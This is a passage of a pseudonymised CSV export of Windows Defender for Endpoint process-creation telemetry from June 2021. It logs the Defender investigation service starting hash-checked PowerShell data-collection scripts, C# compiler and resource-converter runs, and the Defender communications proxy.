Protection\DataCollection\7740.5699111.0.6126710.6079631-075b1b75665454b124533865bb823596d0f0d475\FilePII_205d42406d952a4bd6298fd0e29dbbaf16432c34.ps1' }""",True,2021-06-24 08:37:03.077525600+00:00,18648,\Device\HarddiskVolume3\Program Files\Windows Defender Advanced Threat Protection\SenseIR.exe,System,TokenElevationTypeDefault,59860b94-e2f9-40e0-bbe3-4caaeca1df70,b11a7e51e2f2815d1736d0a5826e0b88f609ee8b,,,2021-06-24 08:37:13.310708700+00:00,2021-06-24 08:39:16.015851300+00:00,ee8c4323-5034-4c3e-9e1d-212420709db6,computerpii_0a470890c60768167990033d701e7bd881398861,177718,False,10.7740.19041.1052,False,11540474045177388,,11540474045177389,2021-06-24 08:37:13.230228+00:00,17840,2021-06-24 08:37:13.230228+00:00,\Device\HarddiskVolume3\Windows\System32\WindowsPowerShell\v1.0\powershell.exe,17840,128,ActiveProcessStartkey,C:\Windows\System32\WindowsPowerShell\v1.0,452608,2037-06-10 07:45:25+00:00,2020-10-09 20:48:24.470101200+00:00,2021-06-24 00:54:33.592091900+00:00,2020-10-09 20:48:24.470101200+00:00,128,NoTruncation,0,,10.0,False,,,,,True,StrPII_0f28d3f32a893c06f6cf2f5cc375c1420f8d3441,997,997,False,,256.0,,0.0,,,,,,,Valid,OsVendor,Valid,OsVendor,Microsoft Corporation,Microsoft® Windows® Operating System,10.0.19041.546,POWERSHELL,PowerShell.EXE,Windows PowerShell,Microsoft Corporation,Microsoft® Windows® Operating System,10.0.19041.964,ConHost,CONHOST.EXE,Console Window Host
+1436,True,System,S-1-5-19,LOCAL SERVICE,NT AUTHORITY,TokenElevationTypeDefault,NotWeb,2021-06-24 08:37:13.240642800+00:00,16964,conhost.exe,conhost.exe 0xffffffff -ForceV1,PortableExecutable,2021-05-12 01:12:35.470188200+00:00,C:\Windows\System32\conhost.exe,875008,81ca40085fc75babd2c91d18aa9ffa68,6651ab6c5c6d85c86b0c6c532115662e09f338fa8cc1233e1434139346f25ef6,c313e591b29d8be1cbe3809826a6a8647314698e,04029e121a0cfa5991749937dd22a1d9,9f914d42706fe215501044acd85a32d58aaef1419d404fddfa5d3b48f66ccd9f,f43d9bb316e30ae1a3494ac5b0624f6bea1bf054,S-1-5-19,NT AUTHORITY,LOCAL SERVICE,2021-06-24 08:37:13.230219800+00:00,5008,powershell.exe,"powershell.exe -ExecutionPolicy AllSigned -NoProfile -NonInteractive -Command ""& {$OutputEncoding = [Console]::OutputEncoding =[System.Text.Encoding]::UTF8;$scriptFileStream = [System.IO.File]::Open('C:\ProgramData\Microsoft\Windows Defender Advanced Threat Protection\DataCollection\7740.5699111.0.6126710.6079631-075b1b75665454b124533865bb823596d0f0d475\FilePII_d69d566e236b52ebad2e98b0e24986d45a8b4693.ps1', [System.IO.FileMode]::Open, [System.IO.FileAccess]::Read, [System.IO.FileAccess]::Read);$calculatedHash = Get-FileHash 'C:\ProgramData\Microsoft\Windows Defender Advanced Threat Protection\DataCollection\7740.5699111.0.6126710.6079631-075b1b75665454b124533865bb823596d0f0d475\FilePII_d69d566e236b52ebad2e98b0e24986d45a8b4693.ps1' -Algorithm SHA256;if (!($calculatedHash.Hash -eq '3a0bbacb5e49ec8cbd9055bf26cbbb0fec3f2c095bee682639e66b8c6a1acdf3')) { exit 323;}; . 'C:\ProgramData\Microsoft\Windows Defender Advanced Threat Protection\DataCollection\7740.5699111.0.6126710.6079631-075b1b75665454b124533865bb823596d0f0d475\FilePII_d69d566e236b52ebad2e98b0e24986d45a8b4693.ps1' }""",True,2021-06-24 08:37:03.077525600+00:00,18648,\Device\HarddiskVolume3\Program Files\Windows Defender Advanced Threat Protection\SenseIR.exe,System,TokenElevationTypeDefault,59860b94-e2f9-40e0-bbe3-4caaeca1df70,b11a7e51e2f2815d1736d0a5826e0b88f609ee8b,,,2021-06-24 08:37:13.310926+00:00,2021-06-24 08:39:16.015914700+00:00,e207f5ce-8916-4180-9551-6be7a511d756,computerpii_0a470890c60768167990033d701e7bd881398861,177719,False,10.7740.19041.1052,False,11540474045177386,,11540474045177390,2021-06-24 08:37:13.230219800+00:00,5008,2021-06-24 08:37:13.230219800+00:00,\Device\HarddiskVolume3\Windows\System32\WindowsPowerShell\v1.0\powershell.exe,5008,128,ActiveProcessStartkey,C:\Windows\System32\WindowsPowerShell\v1.0,452608,2037-06-10 07:45:25+00:00,2020-10-09 20:48:24.470101200+00:00,2021-06-24 00:54:33.592091900+00:00,2020-10-09 20:48:24.470101200+00:00,128,NoTruncation,0,,10.0,False,,,,,True,StrPII_0f28d3f32a893c06f6cf2f5cc375c1420f8d3441,997,997,False,,256.0,,0.0,,,,,,,Valid,OsVendor,Valid,OsVendor,Microsoft Corporation,Microsoft® Windows® Operating System,10.0.19041.546,POWERSHELL,PowerShell.EXE,Windows PowerShell,Microsoft Corporation,Microsoft® Windows® Operating System,10.0.19041.964,ConHost,CONHOST.EXE,Console Window Host
+1437,True,System,S-1-5-18,SYSTEM,NT AUTHORITY,TokenElevationTypeDefault,NotWeb,2021-06-24 08:37:13.318321800+00:00,4880,conhost.exe,conhost.exe 0xffffffff -ForceV1,PortableExecutable,2021-05-12 01:12:35.470188200+00:00,C:\Windows\System32\conhost.exe,875008,81ca40085fc75babd2c91d18aa9ffa68,6651ab6c5c6d85c86b0c6c532115662e09f338fa8cc1233e1434139346f25ef6,c313e591b29d8be1cbe3809826a6a8647314698e,04029e121a0cfa5991749937dd22a1d9,9f914d42706fe215501044acd85a32d58aaef1419d404fddfa5d3b48f66ccd9f,f43d9bb316e30ae1a3494ac5b0624f6bea1bf054,S-1-5-18,NT AUTHORITY,SYSTEM,2021-06-24 08:37:13.230225200+00:00,5820,powershell.exe,"powershell.exe -ExecutionPolicy AllSigned -NoProfile -NonInteractive -Command ""& {$OutputEncoding = [Console]::OutputEncoding =[System.Text.Encoding]::UTF8;$scriptFileStream = [System.IO.File]::Open('C:\ProgramData\Microsoft\Windows Defender Advanced Threat Protection\DataCollection\7740.5699111.0.6126710.6079631-075b1b75665454b124533865bb823596d0f0d475\FilePII_b0e4a6fa7a08a13dc38c85a6be2c0794960d2d83.ps1', [System.IO.FileMode]::Open, [System.IO.FileAccess]::Read, [System.IO.FileAccess]::Read);$calculatedHash = Get-FileHash 'C:\ProgramData\Microsoft\Windows Defender Advanced Threat Protection\DataCollection\7740.5699111.0.6126710.6079631-075b1b75665454b124533865bb823596d0f0d475\FilePII_b0e4a6fa7a08a13dc38c85a6be2c0794960d2d83.ps1' -Algorithm SHA256;if (!($calculatedHash.Hash -eq '55ac3e59e2c2dd5964cb1760cab52db52c7ff7bbb2cb5e65ddf2ab4ad48043d3')) { exit 323;}; . 'C:\ProgramData\Microsoft\Windows Defender Advanced Threat Protection\DataCollection\7740.5699111.0.6126710.6079631-075b1b75665454b124533865bb823596d0f0d475\FilePII_b0e4a6fa7a08a13dc38c85a6be2c0794960d2d83.ps1' }""",True,2021-06-24 08:37:03.077525600+00:00,18648,\Device\HarddiskVolume3\Program Files\Windows Defender Advanced Threat Protection\SenseIR.exe,System,TokenElevationTypeDefault,59860b94-e2f9-40e0-bbe3-4caaeca1df70,b11a7e51e2f2815d1736d0a5826e0b88f609ee8b,,,2021-06-24 08:37:13.351206100+00:00,2021-06-24 08:39:16.015982700+00:00,30426e7f-c048-404a-94af-17d2dd174e5c,computerpii_0a470890c60768167990033d701e7bd881398861,177720,False,10.7740.19041.1052,False,11540474045177387,,11540474045177391,2021-06-24 08:37:13.230225200+00:00,5820,2021-06-24 08:37:13.230225200+00:00,\Device\HarddiskVolume3\Windows\System32\WindowsPowerShell\v1.0\powershell.exe,5820,128,ActiveProcessStartkey,C:\Windows\System32\WindowsPowerShell\v1.0,452608,2037-06-10 07:45:25+00:00,2020-10-09 20:48:24.470101200+00:00,2021-06-24 00:54:33.592091900+00:00,2020-10-09 20:48:24.470101200+00:00,128,NoTruncation,0,,10.0,False,,,,,True,StrPII_0f28d3f32a893c06f6cf2f5cc375c1420f8d3441,999,999,False,,256.0,,0.0,,,,,,,Valid,OsVendor,Valid,OsVendor,Microsoft Corporation,Microsoft® Windows® Operating System,10.0.19041.546,POWERSHELL,PowerShell.EXE,Windows PowerShell,Microsoft Corporation,Microsoft® Windows® Operating System,10.0.19041.964,ConHost,CONHOST.EXE,Console Window Host
+1438,True,System,S-1-5-19,LOCAL SERVICE,NT AUTHORITY,TokenElevationTypeDefault,NotWeb,2021-06-24 08:37:17.572676+00:00,14376,csc.exe,"""csc.exe"" /noconfig /fullpaths @""C:\Windows\ServiceProfiles\LocalService\AppData\Local\Temp\n0c4eck1.cmdline""",PortableExecutable,2019-12-07 09:10:35.992536100+00:00,C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe,2759232,f65b029562077b648a6a5f6a1aa76a66,4a6d0864e19c0368a47217c129b075dddf61a6a262388f9d21045d82f3423ed7,528973416456c780051889ca1709510b6bf73370,04029e121a0cfa5991749937dd22a1d9,9f914d42706fe215501044acd85a32d58aaef1419d404fddfa5d3b48f66ccd9f,f43d9bb316e30ae1a3494ac5b0624f6bea1bf054,S-1-5-19,NT AUTHORITY,LOCAL SERVICE,2021-06-24 08:37:13.230219800+00:00,5008,powershell.exe,"powershell.exe -ExecutionPolicy AllSigned -NoProfile -NonInteractive -Command ""& {$OutputEncoding = [Console]::OutputEncoding =[System.Text.Encoding]::UTF8;$scriptFileStream = [System.IO.File]::Open('C:\ProgramData\Microsoft\Windows Defender Advanced Threat Protection\DataCollection\7740.5699111.0.6126710.6079631-075b1b75665454b124533865bb823596d0f0d475\FilePII_d69d566e236b52ebad2e98b0e24986d45a8b4693.ps1', [System.IO.FileMode]::Open, [System.IO.FileAccess]::Read, [System.IO.FileAccess]::Read);$calculatedHash = Get-FileHash 'C:\ProgramData\Microsoft\Windows Defender Advanced Threat Protection\DataCollection\7740.5699111.0.6126710.6079631-075b1b75665454b124533865bb823596d0f0d475\FilePII_d69d566e236b52ebad2e98b0e24986d45a8b4693.ps1' -Algorithm SHA256;if (!($calculatedHash.Hash -eq '3a0bbacb5e49ec8cbd9055bf26cbbb0fec3f2c095bee682639e66b8c6a1acdf3')) { exit 323;}; . 'C:\ProgramData\Microsoft\Windows Defender Advanced Threat Protection\DataCollection\7740.5699111.0.6126710.6079631-075b1b75665454b124533865bb823596d0f0d475\FilePII_d69d566e236b52ebad2e98b0e24986d45a8b4693.ps1' }""",True,2021-06-24 08:37:03.077525600+00:00,18648,\Device\HarddiskVolume3\Program Files\Windows Defender Advanced Threat Protection\SenseIR.exe,System,TokenElevationTypeDefault,59860b94-e2f9-40e0-bbe3-4caaeca1df70,b11a7e51e2f2815d1736d0a5826e0b88f609ee8b,,,2021-06-24 08:37:17.592441900+00:00,2021-06-24 08:39:16.020205200+00:00,bf4f9901-1887-40f8-8e92-5880fb1e7893,computerpii_0a470890c60768167990033d701e7bd881398861,177773,False,10.7740.19041.1052,False,11540474045177386,,11540474045177395,2021-06-24 08:37:13.230219800+00:00,5008,2021-06-24 08:37:13.230219800+00:00,\Device\HarddiskVolume3\Windows\System32\WindowsPowerShell\v1.0\powershell.exe,5008,128,ActiveProcessStartkey,C:\Windows\System32\WindowsPowerShell\v1.0,452608,2037-06-10 07:45:25+00:00,2020-10-09 20:48:24.470101200+00:00,2021-06-24 00:54:33.592091900+00:00,2020-10-09 20:48:24.470101200+00:00,128,NoTruncation,0,,10.0,False,,,,,True,StrPII_0f28d3f32a893c06f6cf2f5cc375c1420f8d3441,997,997,False,,256.0,0.0,257.0,,,,,,,Valid,OsVendor,Valid,OsVendorApplication,Microsoft Corporation,Microsoft® Windows® Operating System,10.0.19041.546,POWERSHELL,PowerShell.EXE,Windows PowerShell,Microsoft Corporation,Microsoft® .NET Framework,4.8.4084.0,csc.exe,csc.exe,Visual C# Command Line Compiler
+1439,True,System,S-1-5-19,LOCAL SERVICE,NT AUTHORITY,TokenElevationTypeDefault,NotWeb,2021-06-24 08:37:17.980491700+00:00,13076,cvtres.exe,"cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 ""/OUT:C:\Windows\SERVIC~1\LOCALS~1\AppData\Local\Temp\FilePII_c438447e382e74795d6c5120362e13d524021a26.tmp"" ""c:\Windows\ServiceProfiles\LocalService\AppData\Local\Temp\FilePII_6f4dfcec6c375c32b5900607ff0400b89e4c7830.TMP""",PortableExecutable,2019-12-07 09:10:36.196453400+00:00,C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe,52744,c877cbb966ea5939aa2a17b6a5160950,1fe531eac592b480aa4bd16052b909c3431434f17e7ae163d248355558ce43a6,2a3249732f5aa4588a4a9895ffe217355041d663,f65b029562077b648a6a5f6a1aa76a66,4a6d0864e19c0368a47217c129b075dddf61a6a262388f9d21045d82f3423ed7,528973416456c780051889ca1709510b6bf73370,S-1-5-19,NT AUTHORITY,LOCAL SERVICE,2021-06-24 08:37:17.572676+00:00,14376,csc.exe,"""csc.exe"" /noconfig /fullpaths @""C:\Windows\ServiceProfiles\LocalService\AppData\Local\Temp\n0c4eck1.cmdline""",True,2021-06-24 08:37:13.230219800+00:00,5008,\Device\HarddiskVolume3\Windows\System32\WindowsPowerShell\v1.0\powershell.exe,System,TokenElevationTypeDefault,59860b94-e2f9-40e0-bbe3-4caaeca1df70,b11a7e51e2f2815d1736d0a5826e0b88f609ee8b,,,2021-06-24 08:37:18.066993700+00:00,2021-06-24 08:39:16.020534+00:00,66ee0140-643d-47a6-9afd-fe8b0e57448f,computerpii_0a470890c60768167990033d701e7bd881398861,177777,False,10.7740.19041.1052,False,11540474045177395,,11540474045177396,2021-06-24 08:37:17.572676+00:00,14376,2021-06-24 08:37:17.572676+00:00,\Device\HarddiskVolume3\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe,14376,18560,TerminateProcessStartkey,C:\Windows\Microsoft.NET\Framework64\v4.0.30319,2759232,2019-11-24 09:26:27+00:00,2019-12-07 09:10:35.992536100+00:00,2021-06-24 00:59:44.006936100+00:00,2019-12-07 09:10:35.992536100+00:00,2176,NoTruncation,0,,10.0,False,,,,,True,StrPII_0f28d3f32a893c06f6cf2f5cc375c1420f8d3441,997,997,False,0.0,257.0,,,,,,,,,Valid,OsVendorApplication,Valid,OsVendor,Microsoft Corporation,Microsoft® .NET Framework,4.8.4084.0,csc.exe,csc.exe,Visual C# Command Line Compiler,Microsoft Corporation,Microsoft® .NET Framework,14.10.25028.0,CVTRES.EXE,CVTRES.EXE,Microsoft® Resource File To COFF Object Conversion Utility
+1440,True,System,S-1-5-19,LOCAL SERVICE,NT AUTHORITY,TokenElevationTypeDefault,NotWeb,2021-06-24 08:37:18.165528+00:00,11080,csc.exe,"""csc.exe"" /noconfig /fullpaths @""C:\Windows\ServiceProfiles\LocalService\AppData\Local\Temp\qxbqq405.cmdline""",PortableExecutable,2019-12-07 09:10:35.992536100+00:00,C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe,2759232,f65b029562077b648a6a5f6a1aa76a66,4a6d0864e19c0368a47217c129b075dddf61a6a262388f9d21045d82f3423ed7,528973416456c780051889ca1709510b6bf73370,04029e121a0cfa5991749937dd22a1d9,9f914d42706fe215501044acd85a32d58aaef1419d404fddfa5d3b48f66ccd9f,f43d9bb316e30ae1a3494ac5b0624f6bea1bf054,S-1-5-19,NT AUTHORITY,LOCAL SERVICE,2021-06-24 08:37:13.230219800+00:00,5008,powershell.exe,"powershell.exe -ExecutionPolicy AllSigned -NoProfile -NonInteractive -Command ""& {$OutputEncoding = [Console]::OutputEncoding =[System.Text.Encoding]::UTF8;$scriptFileStream = [System.IO.File]::Open('C:\ProgramData\Microsoft\Windows Defender Advanced Threat Protection\DataCollection\7740.5699111.0.6126710.6079631-075b1b75665454b124533865bb823596d0f0d475\FilePII_d69d566e236b52ebad2e98b0e24986d45a8b4693.ps1', [System.IO.FileMode]::Open, [System.IO.FileAccess]::Read, [System.IO.FileAccess]::Read);$calculatedHash = Get-FileHash 'C:\ProgramData\Microsoft\Windows Defender Advanced Threat Protection\DataCollection\7740.5699111.0.6126710.6079631-075b1b75665454b124533865bb823596d0f0d475\FilePII_d69d566e236b52ebad2e98b0e24986d45a8b4693.ps1' -Algorithm SHA256;if (!($calculatedHash.Hash -eq '3a0bbacb5e49ec8cbd9055bf26cbbb0fec3f2c095bee682639e66b8c6a1acdf3')) { exit 323;}; . 'C:\ProgramData\Microsoft\Windows Defender Advanced Threat Protection\DataCollection\7740.5699111.0.6126710.6079631-075b1b75665454b124533865bb823596d0f0d475\FilePII_d69d566e236b52ebad2e98b0e24986d45a8b4693.ps1' }""",True,2021-06-24 08:37:03.077525600+00:00,18648,\Device\HarddiskVolume3\Program Files\Windows Defender Advanced Threat Protection\SenseIR.exe,System,TokenElevationTypeDefault,59860b94-e2f9-40e0-bbe3-4caaeca1df70,b11a7e51e2f2815d1736d0a5826e0b88f609ee8b,,,2021-06-24 08:37:18.268354400+00:00,2021-06-24 08:39:16.020870800+00:00,81625c60-5fc4-4698-aac5-c9a95f955897,computerpii_0a470890c60768167990033d701e7bd881398861,177781,False,10.7740.19041.1052,False,11540474045177386,,11540474045177397,2021-06-24 08:37:13.230219800+00:00,5008,2021-06-24 08:37:13.230219800+00:00,\Device\HarddiskVolume3\Windows\System32\WindowsPowerShell\v1.0\powershell.exe,5008,18560,ActiveProcessStartkey,C:\Windows\System32\WindowsPowerShell\v1.0,452608,2037-06-10 07:45:25+00:00,2020-10-09 20:48:24.470101200+00:00,2021-06-24 00:54:33.592091900+00:00,2020-10-09 20:48:24.470101200+00:00,128,NoTruncation,0,,10.0,False,,,,,True,StrPII_0f28d3f32a893c06f6cf2f5cc375c1420f8d3441,997,997,False,,256.0,0.0,257.0,,,,,,,Valid,OsVendor,Valid,OsVendorApplication,Microsoft Corporation,Microsoft® Windows® Operating System,10.0.19041.546,POWERSHELL,PowerShell.EXE,Windows PowerShell,Microsoft Corporation,Microsoft® .NET Framework,4.8.4084.0,csc.exe,csc.exe,Visual C# Command Line Compiler
+1441,True,System,S-1-5-19,LOCAL SERVICE,NT AUTHORITY,TokenElevationTypeDefault,NotWeb,2021-06-24 08:37:18.242309300+00:00,16500,cvtres.exe,"cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 ""/OUT:C:\Windows\SERVIC~1\LOCALS~1\AppData\Local\Temp\FilePII_6720f5c0d155cef33af46c3d87e0523b8bfa90d9.tmp"" ""c:\Windows\ServiceProfiles\LocalService\AppData\Local\Temp\FilePII_b29f76af8aa7cd8c8a4e0e6b35be329c076c673d.TMP""",PortableExecutable,2019-12-07 09:10:36.196453400+00:00,C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe,52744,c877cbb966ea5939aa2a17b6a5160950,1fe531eac592b480aa4bd16052b909c3431434f17e7ae163d248355558ce43a6,2a3249732f5aa4588a4a9895ffe217355041d663,f65b029562077b648a6a5f6a1aa76a66,4a6d0864e19c0368a47217c129b075dddf61a6a262388f9d21045d82f3423ed7,528973416456c780051889ca1709510b6bf73370,S-1-5-19,NT AUTHORITY,LOCAL SERVICE,2021-06-24 08:37:18.165528+00:00,11080,csc.exe,"""csc.exe"" /noconfig /fullpaths @""C:\Windows\ServiceProfiles\LocalService\AppData\Local\Temp\qxbqq405.cmdline""",True,2021-06-24 08:37:13.230219800+00:00,5008,\Device\HarddiskVolume3\Windows\System32\WindowsPowerShell\v1.0\powershell.exe,System,TokenElevationTypeDefault,59860b94-e2f9-40e0-bbe3-4caaeca1df70,b11a7e51e2f2815d1736d0a5826e0b88f609ee8b,,,2021-06-24 08:37:18.271325900+00:00,2021-06-24 08:39:16.020954500+00:00,91e2c231-3ed5-40a4-8531-89a596a2b1ae,computerpii_0a470890c60768167990033d701e7bd881398861,177782,False,10.7740.19041.1052,False,11540474045177397,,11540474045177398,2021-06-24 08:37:18.165528+00:00,11080,2021-06-24 08:37:18.165528+00:00,\Device\HarddiskVolume3\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe,11080,18560,TerminateProcessStartkey,C:\Windows\Microsoft.NET\Framework64\v4.0.30319,2759232,2019-11-24 09:26:27+00:00,2019-12-07 09:10:35.992536100+00:00,2021-06-24 00:59:44.006936100+00:00,2019-12-07 09:10:35.992536100+00:00,18560,NoTruncation,0,,10.0,False,,,,,True,StrPII_0f28d3f32a893c06f6cf2f5cc375c1420f8d3441,997,997,False,0.0,257.0,,,,,,,,,Valid,OsVendorApplication,Valid,OsVendor,Microsoft Corporation,Microsoft® .NET Framework,4.8.4084.0,csc.exe,csc.exe,Visual C# Command Line Compiler,Microsoft Corporation,Microsoft® .NET Framework,14.10.25028.0,CVTRES.EXE,CVTRES.EXE,Microsoft® Resource File To COFF Object Conversion Utility
+1442,True,System,S-1-5-18,SYSTEM,NT AUTHORITY,TokenElevationTypeDefault,NotWeb,2021-06-24 08:37:18.872781400+00:00,20800,csc.exe,"""csc.exe"" /noconfig /fullpaths @""C:\Windows\TEMP\qbsezsvi\qbsezsvi.cmdline""",PortableExecutable,2019-12-07 09:10:35.992536100+00:00,C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe,2759232,f65b029562077b648a6a5f6a1aa76a66,4a6d0864e19c0368a47217c129b075dddf61a6a262388f9d21045d82f3423ed7,528973416456c780051889ca1709510b6bf73370,04029e121a0cfa5991749937dd22a1d9,9f914d42706fe215501044acd85a32d58aaef1419d404fddfa5d3b48f66ccd9f,f43d9bb316e30ae1a3494ac5b0624f6bea1bf054,S-1-5-18,NT AUTHORITY,SYSTEM,2021-06-24 08:37:13.230225200+00:00,5820,powershell.exe,"powershell.exe -ExecutionPolicy AllSigned -NoProfile -NonInteractive -Command ""& {$OutputEncoding = [Console]::OutputEncoding =[System.Text.Encoding]::UTF8;$scriptFileStream = [System.IO.File]::Open('C:\ProgramData\Microsoft\Windows Defender Advanced Threat Protection\DataCollection\7740.5699111.0.6126710.6079631-075b1b75665454b124533865bb823596d0f0d475\FilePII_b0e4a6fa7a08a13dc38c85a6be2c0794960d2d83.ps1', [System.IO.FileMode]::Open, [System.IO.FileAccess]::Read, [System.IO.FileAccess]::Read);$calculatedHash = Get-FileHash 'C:\ProgramData\Microsoft\Windows Defender Advanced Threat Protection\DataCollection\7740.5699111.0.6126710.6079631-075b1b75665454b124533865bb823596d0f0d475\FilePII_b0e4a6fa7a08a13dc38c85a6be2c0794960d2d83.ps1' -Algorithm SHA256;if (!($calculatedHash.Hash -eq '55ac3e59e2c2dd5964cb1760cab52db52c7ff7bbb2cb5e65ddf2ab4ad48043d3')) { exit 323;}; . 'C:\ProgramData\Microsoft\Windows Defender Advanced Threat Protection\DataCollection\7740.5699111.0.6126710.6079631-075b1b75665454b124533865bb823596d0f0d475\FilePII_b0e4a6fa7a08a13dc38c85a6be2c0794960d2d83.ps1' }""",True,2021-06-24 08:37:03.077525600+00:00,18648,\Device\HarddiskVolume3\Program Files\Windows Defender Advanced Threat Protection\SenseIR.exe,System,TokenElevationTypeDefault,59860b94-e2f9-40e0-bbe3-4caaeca1df70,b11a7e51e2f2815d1736d0a5826e0b88f609ee8b,,,2021-06-24 08:37:18.897102200+00:00,2021-06-24 08:39:16.022278+00:00,31dc66cd-d887-43d9-b5ab-444fafa6b492,computerpii_0a470890c60768167990033d701e7bd881398861,177797,False,10.7740.19041.1052,False,11540474045177387,,11540474045177399,2021-06-24 08:37:13.230225200+00:00,5820,2021-06-24 08:37:13.230225200+00:00,powershell.exe,5820,256,ActiveProcessStartkey,C:\Windows\System32\WindowsPowerShell\v1.0,452608,2037-06-10 07:45:25+00:00,2020-10-09 20:48:24.470101200+00:00,2021-06-24 00:54:33.592091900+00:00,2020-10-09 20:48:24.470101200+00:00,128,NoTruncation,0,,10.0,False,,,,,True,StrPII_0f28d3f32a893c06f6cf2f5cc375c1420f8d3441,999,999,False,,256.0,,,,,,,,,Valid,OsVendor,Valid,OsVendorApplication,Microsoft Corporation,Microsoft® Windows® Operating System,10.0.19041.546,POWERSHELL,PowerShell.EXE,Windows PowerShell,Microsoft Corporation,Microsoft® .NET Framework,4.8.4084.0,csc.exe,csc.exe,Visual C# Command Line Compiler
+1443,True,System,S-1-5-18,SYSTEM,NT AUTHORITY,TokenElevationTypeDefault,NotWeb,2021-06-24 08:37:18.932756600+00:00,21136,cvtres.exe,"cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 ""/OUT:C:\Windows\TEMP\FilePII_183f2dfc8b62af48955ff40b457bcc721c251119.tmp"" ""c:\Windows\Temp\qbsezsvi\FilePII_61a9504288e58dacb76ba0fa3019e6af61660c94.TMP""",PortableExecutable,2019-12-07 09:10:36.196453400+00:00,C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe,52744,c877cbb966ea5939aa2a17b6a5160950,1fe531eac592b480aa4bd16052b909c3431434f17e7ae163d248355558ce43a6,2a3249732f5aa4588a4a9895ffe217355041d663,f65b029562077b648a6a5f6a1aa76a66,4a6d0864e19c0368a47217c129b075dddf61a6a262388f9d21045d82f3423ed7,528973416456c780051889ca1709510b6bf73370,S-1-5-18,NT AUTHORITY,SYSTEM,2021-06-24 08:37:18.872781400+00:00,20800,csc.exe,"""csc.exe"" /noconfig /fullpaths @""C:\Windows\TEMP\qbsezsvi\qbsezsvi.cmdline""",True,2021-06-24 08:37:13.230225200+00:00,5820,powershell.exe,System,TokenElevationTypeDefault,59860b94-e2f9-40e0-bbe3-4caaeca1df70,b11a7e51e2f2815d1736d0a5826e0b88f609ee8b,,,2021-06-24 08:37:18.946922500+00:00,2021-06-24 08:39:16.022360800+00:00,ca4b4ed9-da2d-42ef-b465-8dad244a6d56,computerpii_0a470890c60768167990033d701e7bd881398861,177798,False,10.7740.19041.1052,False,11540474045177399,,11540474045177400,2021-06-24 08:37:18.872781400+00:00,20800,2021-06-24 08:37:18.872781400+00:00,\Device\HarddiskVolume3\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe,20800,128,ActiveProcessStartkey,C:\Windows\Microsoft.NET\Framework64\v4.0.30319,2759232,2019-11-24 09:26:27+00:00,2019-12-07 09:10:35.992536100+00:00,2021-06-24 08:37:18.876994800+00:00,2019-12-07 09:10:35.992536100+00:00,256,NoTruncation,0,,10.0,False,,,,,True,StrPII_0f28d3f32a893c06f6cf2f5cc375c1420f8d3441,999,999,False,,,0.0,1.0,,,,,,,Valid,OsVendorApplication,Valid,OsVendor,Microsoft Corporation,Microsoft® .NET Framework,4.8.4084.0,csc.exe,csc.exe,Visual C# Command Line Compiler,Microsoft Corporation,Microsoft® .NET Framework,14.10.25028.0,CVTRES.EXE,CVTRES.EXE,Microsoft® Resource File To COFF Object Conversion Utility
+1444,True,System,S-1-5-18,SYSTEM,NT AUTHORITY,TokenElevationTypeDefault,NotWeb,2021-06-23 01:18:06.176324200+00:00,1104,SenseCncProxy.exe,4852,PortableExecutable,2021-05-12 01:12:26.930234800+00:00,C:\Program Files\Windows Defender Advanced Threat Protection\SenseCncProxy.exe,744776,affeaa20cf87ef4bbdc1529ab7fea66d,617bacf42b34dfb44986b4c855f07a7db54b27b6a5a78101bf4e53945d4e65b6,b19ae47bee16c9e6111db0ce54ee8ab52b32273d,7683949c195624008c868b6a7ab6a45c,8a31fd68d0629b6e486209353210c6e4f815ffb1b38e7ab58438ca0c9637f018,3eb02a132c439e2adf17ee32ddf6208727092c5a,S-1-5-18,NT AUTHORITY,SYSTEM,2021-06-10 00:46:11.888696800+00:00,4916,MsSense.exe,"""MsSense.exe""",True,2021-06-10 00:46:10.554990700+00:00,988,services.exe,System,TokenElevationTypeDefault,59860b94-e2f9-40e0-bbe3-4caaeca1df70,b11a7e51e2f2815d1736d0a5826e0b88f609ee8b,,,2021-06-23 01:18:06.749333300+00:00,2021-06-23 01:19:37.516063700+00:00,4d3218be-9728-4677-9187-26f14f142740,computerpii_0a470890c60768167990033d701e7bd881398861,157563,False,10.7740.19041.1052,False,11540474045137006,,11540474045172292,2021-06-10 00:46:11.888696800+00:00,4916,2021-06-10 00:46:11.888696800+00:00,\Device\HarddiskVolume3\Program Files\Windows Defender Advanced Threat Protection\MsSense.exe,4916,128,ActiveProcessStartkey,C:\Program Files\Windows Defender Advanced Threat Protection,5393304,2014-12-21 17:17:53+00:00,2021-06-09 01:20:34.243399200+00:00,2021-06-10 00:46:12.793828700+00:00,2021-06-09 01:20:34.069525500+00:00,256,NoTruncation,0,,10.0,False,,,,,True,StrPII_0f28d3f32a893c06f6cf2f5cc375c1420f8d3441,999,999,False,,,,0.0,,,,,,,Valid,OsVendor,Valid,OsVendor,Microsoft Corporation,Microsoft® Windows® Operating System,10.7740.19041.1052,MsSense.exe,MsSense.exe,Windows Defender Advanced Threat Protection Service Executable,Microsoft Corporation,Microsoft® Windows® Operating System,10.7740.19041.964,SenseCncProxy.exe,SenseCncProxy.exe,Windows Defender Advanced Threat Protection Communications module
